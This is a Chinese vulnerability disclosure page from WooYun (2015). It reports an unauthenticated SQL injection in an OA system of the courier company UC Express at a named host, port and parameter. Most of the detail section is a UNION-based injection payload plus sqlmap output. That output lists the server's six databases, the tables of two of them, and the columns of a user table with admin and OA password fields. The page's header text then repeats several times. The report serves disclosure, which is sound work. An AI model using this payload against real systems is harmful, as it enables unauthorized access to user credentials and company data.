优速快递某站存在SQL注射漏洞影响6个库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151530

漏洞标题：优速快递某站存在SQL注射漏洞影响6个库

漏洞作者：路人甲

提交时间：2015-11-30 17:57

修复时间：2015-12-05 17:58

公开时间：2015-12-05 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-30：细节已通知厂商并且等待厂商处理中
2015-12-05：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

SQL注射

详细说明：

OA系统

http://ucoa.uc56.com:8088/Login.aspx

未授权访问注入点

http://ucoa.uc56.com:8088/OaWeb/PresonnelMain.aspx?typeid=26

Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+C
HAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(
103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NU
LL--
---
[15:37:56] [INFO] testing Microsoft SQL Server
[15:37:56] [INFO] confirming Microsoft SQL Server
[15:37:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:37:57] [INFO] fetching database names
[15:37:57] [INFO] the SQL query used returns 6 entries
[15:37:57] [INFO] retrieved: master
[15:37:57] [INFO] retrieved: model
[15:37:58] [INFO] retrieved: msdb
[15:37:58] [INFO] retrieved: tempdb
[15:37:59] [INFO] retrieved: ucoa
[15:37:59] [INFO] retrieved: ucweb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ucoa
[*] ucweb

Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+C
HAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(
103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NU
LL--
---
[15:39:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:39:14] [INFO] fetching tables for database: ucoa
[15:39:14] [INFO] the SQL query used returns 70 entries
[15:39:14] [INFO] retrieved: dbo.a_user
[15:39:15] [INFO] retrieved: dbo.Android_User
[15:39:15] [INFO] retrieved: dbo.android_Version
[15:39:15] [INFO] retrieved: dbo.androidArea
[15:39:15] [INFO] retrieved: dbo.AreaClassfiy
[15:39:16] [INFO] retrieved: dbo.AreaClassfiy
[15:39:16] [INFO] retrieved: dbo.BackupDatabase
[15:39:16] [INFO] retrieved: dbo.BaiDuYuan
[15:39:19] [INFO] retrieved: dbo.Client
[15:39:19] [INFO] retrieved: dbo.ClientRecord
[15:39:20] [INFO] retrieved: dbo.CompanyIMG
[15:39:20] [INFO] retrieved: dbo.ContactCenter
[15:39:21] [INFO] retrieved: dbo.ContactMessage
[15:39:21] [INFO] retrieved: dbo.DemandFeedback
[15:39:22] [INFO] retrieved: dbo.Error_User
[15:39:23] [INFO] retrieved: dbo.Fax
[15:39:23] [INFO] retrieved: dbo.GraphicInfo
[15:39:23] [INFO] retrieved: dbo.GraphicItmeInfo
[15:39:24] [INFO] retrieved: dbo.ImportantMessages
[15:39:24] [INFO] retrieved: dbo.M_DISTRICT
[15:39:24] [INFO] retrieved: dbo.Menus
[15:39:25] [INFO] retrieved: dbo.N_Collection
[15:39:25] [INFO] retrieved: dbo.News
[15:39:25] [INFO] retrieved: dbo.newWxProgram
[15:39:26] [INFO] retrieved: dbo.Notice_Collection
[15:39:26] [INFO] retrieved: dbo.Options
[15:39:26] [INFO] retrieved: dbo.Personnel
[15:39:26] [INFO] retrieved: dbo.Port_EmpDept
[15:39:26] [INFO] retrieved: dbo.Port_EmpStation
[15:39:26] [INFO] retrieved: dbo.Program_backup
[15:39:27] [INFO] retrieved: dbo.Program_backup
[15:39:27] [INFO] retrieved: dbo.Range
[15:39:28] [INFO] retrieved: dbo.ReadRecord
[15:39:28] [INFO] retrieved: dbo.S_SearchClassfiy
[15:39:28] [INFO] retrieved: dbo.ScoreUser_backup
[15:39:29] [INFO] retrieved: dbo.ScoreUser_backup
[15:39:29] [INFO] retrieved: dbo.SiteNocies
[15:39:29] [INFO] retrieved: dbo.SiteNocies
[15:39:29] [INFO] retrieved: dbo.sqlmapoutput
[15:39:30] [INFO] retrieved: dbo.Sys_Role
[15:39:30] [INFO] retrieved: dbo.test2
[15:39:30] [INFO] retrieved: dbo.test2
[15:39:30] [INFO] retrieved: dbo.TodyVisit
[15:39:31] [INFO] retrieved: dbo.Uc_Port_Dept
[15:39:31] [INFO] retrieved: dbo.Uc_Port_Emp
[15:39:31] [INFO] retrieved: dbo.Uc_Port_Station
[15:39:31] [INFO] retrieved: dbo.UC_Video
[15:39:31] [INFO] retrieved: dbo.UcAuthority
[15:39:32] [INFO] retrieved: dbo.UcClaim
[15:39:32] [INFO] retrieved: dbo.UcClassify
[15:39:33] [INFO] retrieved: dbo.UcDemand
[15:39:33] [INFO] retrieved: dbo.UcDownload
[15:39:33] [INFO] retrieved: dbo.UcMateriaClassify
[15:39:33] [INFO] retrieved: dbo.UcMaterial
[15:39:34] [INFO] retrieved: dbo.UcMCfy
[15:39:34] [INFO] retrieved: dbo.UcMessages
[15:39:34] [INFO] retrieved: dbo.UcNotice
[15:39:35] [INFO] retrieved: dbo.UcSofoMsg
[15:39:35] [INFO] retrieved: dbo.UcSofoMsg
[15:39:35] [INFO] retrieved: dbo.UcUnknowngoods
[15:39:36] [INFO] retrieved: dbo.UcUserInfo
[15:39:36] [INFO] retrieved: dbo.V_UnKnownGoods
[15:39:36] [INFO] retrieved: dbo.Votes
[15:39:37] [INFO] retrieved: dbo.VotesUsers
[15:39:37] [INFO] retrieved: dbo.WeiXin_User
[15:39:37] [INFO] retrieved: dbo.WeiXin2015
[15:39:38] [INFO] retrieved: dbo.weixinuser2015
[15:39:38] [INFO] retrieved: dbo.WxProgram
[15:39:38] [INFO] retrieved: dbo.WxUser_backup
[15:39:39] [INFO] retrieved: dbo.WxUser_backup
Database: ucoa
[70 tables]
+-------------------+
| Android_User      |
| AreaClassfiy      |
| AreaClassfiy      |
| BackupDatabase    |
| BaiDuYuan         |
| Client            |
| ClientRecord      |
| CompanyIMG        |
| ContactCenter     |
| ContactMessage    |
| DemandFeedback    |
| Error_User        |
| Fax               |
| GraphicInfo       |
| GraphicItmeInfo   |
| ImportantMessages |
| M_DISTRICT        |
| Menus             |
| N_Collection      |
| News              |
| Notice_Collection |
| Options           |
| Personnel         |
| Port_EmpDept      |
| Port_EmpStation   |
| Program_backup    |
| Program_backup    |
| Range             |
| ReadRecord        |
| S_SearchClassfiy  |
| ScoreUser_backup  |
| ScoreUser_backup  |
| SiteNocies        |
| SiteNocies        |
| Sys_Role          |
| TodyVisit         |
| UC_Video          |
| UcAuthority       |
| UcClaim           |
| UcClassify        |
| UcDemand          |
| UcDownload        |
| UcMCfy            |
| UcMateriaClassify |
| UcMaterial        |
| UcMessages        |
| UcNotice          |
| UcSofoMsg         |
| UcSofoMsg         |
| UcUnknowngoods    |
| UcUserInfo        |
| Uc_Port_Dept      |
| Uc_Port_Emp       |
| Uc_Port_Station   |
| V_UnKnownGoods    |
| Votes             |
| VotesUsers        |
| WeiXin2015        |
| WeiXin_User       |
| WxProgram         |
| WxUser_backup     |
| WxUser_backup     |
| a_user            |
| androidArea       |
| android_Version   |
| newWxProgram      |
| sqlmapoutput      |
| test2             |
| test2             |
| weixinuser2015    |
+-------------------+

Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+C
HAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(
103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NU
LL--
---
[15:40:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:40:44] [INFO] fetching tables for database: ucweb
[15:40:44] [INFO] the SQL query used returns 26 entries
[15:40:44] [INFO] retrieved: dbo.AdImg
[15:40:45] [INFO] retrieved: dbo.Area_info
[15:40:46] [INFO] retrieved: dbo.Area_info
[15:40:46] [INFO] retrieved: dbo.Company
[15:40:46] [INFO] retrieved: dbo.Contact
[15:40:46] [INFO] retrieved: dbo.DataBase_Backup
[15:40:46] [INFO] retrieved: dbo.Guestbook
[15:40:47] [INFO] retrieved: dbo.JoinContact
[15:40:47] [INFO] retrieved: dbo.Links
[15:40:47] [INFO] retrieved: dbo.Menu
[15:40:48] [INFO] retrieved: dbo.News_Img
[15:40:48] [INFO] retrieved: dbo.News_Img
[15:40:49] [INFO] retrieved: dbo.NewsType
[15:40:49] [INFO] retrieved: dbo.Product
[15:40:49] [INFO] retrieved: dbo.Range
[15:40:49] [INFO] retrieved: dbo.Recruitment
[15:40:50] [INFO] retrieved: dbo.ReplyGuestBook
[15:40:50] [INFO] retrieved: dbo.RGuestbook
[15:40:50] [INFO] retrieved: dbo.ServiceHotline
[15:40:50] [INFO] retrieved: dbo.sqlmapoutput
[15:40:50] [INFO] retrieved: dbo.tNews
[15:40:50] [INFO] retrieved: dbo.UC_Activity
[15:40:51] [INFO] retrieved: dbo.UC_People
[15:40:51] [INFO] retrieved: dbo.UcHonor
[15:40:51] [INFO] retrieved: dbo.UserInfo
[15:40:51] [INFO] retrieved: dbo.WebSite
Database: ucweb
[26 tables]
+-----------------+
| AdImg           |
| Area_info       |
| Area_info       |
| Company         |
| Contact         |
| DataBase_Backup |
| Guestbook       |
| JoinContact     |
| Links           |
| Menu            |
| NewsType        |
| News_Img        |
| News_Img        |
| Product         |
| RGuestbook      |
| Range           |
| Recruitment     |
| ReplyGuestBook  |
| ServiceHotline  |
| UC_Activity     |
| UC_People       |
| UcHonor         |
| UserInfo        |
| WebSite         |
| sqlmapoutput    |
| tNews           |
+-----------------+

Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112
HAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CH
103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL
LL--
---
[16:09:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:09:42] [INFO] fetching columns for table 'UcUserInfo' in database 'ucoa'
[16:09:42] [INFO] the SQL query used returns 21 entries
[16:09:42] [INFO] retrieved: "filesize","nchar"
[16:09:42] [INFO] retrieved: "noticeClassify","varchar"
[16:09:43] [INFO] retrieved: "orgCode","varchar"
[16:09:44] [INFO] retrieved: "orgType","varchar"
[16:09:44] [INFO] retrieved: "UcArea","varchar"
[16:09:44] [INFO] retrieved: "UcAuthority","varchar"
[16:09:44] [INFO] retrieved: "UcAuthorityName","varchar"
[16:09:45] [INFO] retrieved: "UcCenter","varchar"
[16:09:45] [INFO] retrieved: "UcCretae","datetime"
[16:09:46] [INFO] retrieved: "UcEMP","varchar"
[16:09:46] [INFO] retrieved: "UcENABLED","char"
[16:09:47] [INFO] retrieved: "UcID","int"
[16:09:47] [INFO] retrieved: "UcIsimportant","int"
[16:09:47] [INFO] retrieved: "UcIsTop","int"
[16:09:48] [INFO] retrieved: "UCNociteAreaID","nchar"
[16:09:48] [INFO] retrieved: "UcOaAdminEnabled","int"
[16:09:48] [INFO] retrieved: "UcSITE","varchar"
[16:09:48] [INFO] retrieved: "UcUserId","varchar"
[16:09:49] [INFO] retrieved: "UcUserName","varchar"
[16:09:49] [INFO] retrieved: "UcUserPwdAdmin","varchar"
[16:09:49] [INFO] retrieved: "UcUserPwdOa","varchar"
[16:09:50] [INFO] fetching entries for table 'UcUserInfo' in database 'ucoa'
[16:09:50] [INFO] the SQL query used returns 19519 entries

用户表具体的数据就不跑了

漏洞证明：

修复方案：

过滤sql特殊字符

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-05 17:58

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151530

漏洞标题：优速快递某站存在SQL注射漏洞影响6个库

相关厂商：uc56.com

漏洞作者：路人甲

提交时间：2015-11-30 17:57

修复时间：2015-12-05 17:58

公开时间：2015-12-05 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151530

漏洞标题：优速快递某站存在SQL注射漏洞影响6个库

相关厂商：uc56.com

漏洞作者： 路人甲

提交时间：2015-11-30 17:57

修复时间：2015-12-05 17:58

公开时间：2015-12-05 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0151530"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云